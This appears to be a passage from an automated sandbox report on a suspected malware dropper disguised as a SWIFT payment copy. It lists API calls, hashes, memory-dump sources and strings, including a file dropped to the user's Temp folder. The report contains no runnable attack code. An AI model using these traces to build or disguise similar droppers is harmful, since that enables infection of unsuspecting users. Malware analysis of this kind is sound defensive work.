                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                        • String ID: (`_${
                                                                                                                        • API String ID: 590372296-1567245380
                                                                                                                        • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                                                        • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                                                                                                        • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                                                        • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404819
                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404826
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404872
                                                                                                                        • LoadBitmapA.USER32(0000006E), ref: 00404885
                                                                                                                        • SetWindowLongA.USER32(?,000000FC,00404E03), ref: 0040489F
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
                                                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
                                                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
                                                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
                                                                                                                        • DeleteObject.GDI32(?), ref: 004048FF
                                                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
                                                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404A39
                                                                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A47
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404A58
                                                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
                                                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
                                                                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
                                                                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
                                                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404C34
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404C44
                                                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
                                                                                                                        • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
                                                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404DDA
                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404DE5
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404DEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                        • String ID: $(`_$M$N
                                                                                                                        • API String ID: 1638840714-1623159249
                                                                                                                        • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                                                        • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                                                                                                                        • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                                                        • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404310
                                                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                                                                                                        • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                                                                                                        • lstrcmpiA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,0042A0A0), ref: 00404428
                                                                                                                        • lstrcatA.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ), ref: 00404434
                                                                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404446
                                                                                                                          • Part of subcall function 0040546C: GetDlgItemTextA.USER32(?,?,00000400,0040447D), ref: 0040547F
                                                                                                                          • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                                                          • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                                                          • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                                                          • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                                                                                                          • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                                                          • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                                                                                                          • Part of subcall function 00404678: SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\btpqr.exe" $(`_$A$C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 2624150263-1686142790
                                                                                                                        • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                                                        • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                                                                                                        • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                                                        • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 123533781-3707357800
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1974802433-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404056
                                                                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 0040406A
                                                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
                                                                                                                        • GetSysColor.USER32(?), ref: 00404099
                                                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
                                                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
                                                                                                                        • lstrlenA.KERNEL32(?), ref: 004040C1
                                                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
                                                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
                                                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404141
                                                                                                                        • SendMessageA.USER32(00000000), ref: 00404144
                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040416F
                                                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
                                                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004041BE
                                                                                                                        • SetCursor.USER32(00000000), ref: 004041C7
                                                                                                                        • ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004041E7
                                                                                                                        • SetCursor.USER32(00000000), ref: 004041EA
                                                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
                                                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\btpqr.exe" $(`_$N$dk_$open
                                                                                                                        • API String ID: 3615053054-3699470888
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                        • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                        • DrawTextA.USER32(00000000,pkfcbfzkpkrqtkjcmcyn Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                        • String ID: (`_$F$pkfcbfzkpkrqtkjcmcyn Setup
                                                                                                                        • API String ID: 941294808-2787602417
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004056AA,?,00000000,000000F1,?), ref: 00405962
                                                                                                                        • GetShortPathNameA.KERNEL32(?,0042C230,00000400), ref: 0040596B
                                                                                                                        • GetShortPathNameA.KERNEL32(00000000,0042BCA8,00000400), ref: 00405988
                                                                                                                        • wsprintfA.USER32 ref: 004059A6
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405A06
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A5E
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405A65
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A6C
                                                                                                                          • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                                                          • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                                                        • String ID: %s=%s$(`_$[Rename]
                                                                                                                        • API String ID: 3445103937-3800591155
                                                                                                                        • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                                                        • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
                                                                                                                        • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
                                                                                                                        • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                                                                                                        • GetSystemDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,00000400), ref: 00405D0C
                                                                                                                        • GetWindowsDirectoryA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,00000400), ref: 00405D1F
                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,0041BA19), ref: 00405D5B
                                                                                                                        • SHGetPathFromIDListA.SHELL32(0041BA19,"C:\Users\user\AppData\Local\Temp\btpqr.exe" ), ref: 00405D69
                                                                                                                        • CoTaskMemFree.OLE32(0041BA19), ref: 00405D74
                                                                                                                        • lstrcatA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                                                                                                        • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\btpqr.exe" ,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\btpqr.exe" $Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$dk_
                                                                                                                        • API String ID: 900638850-1440456647
                                                                                                                        • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                                                        • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                                                                                                        • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                                                                                                        • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                                                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                        • String ID: "C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 589700163-2631913907
                                                                                                                        • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                        • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                                                                                                        • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                        • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00403F07
                                                                                                                        • GetSysColor.USER32(00000000), ref: 00403F23
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403F2F
                                                                                                                        • SetBkMode.GDI32(?,?), ref: 00403F3B
                                                                                                                        • GetSysColor.USER32(?), ref: 00403F4E
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 00403F5E
                                                                                                                        • DeleteObject.GDI32(?), ref: 00403F78
                                                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403F82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2320649405-0
                                                                                                                        • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                        • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                                                                                                        • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                        • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00008A00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00402758
                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402771
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
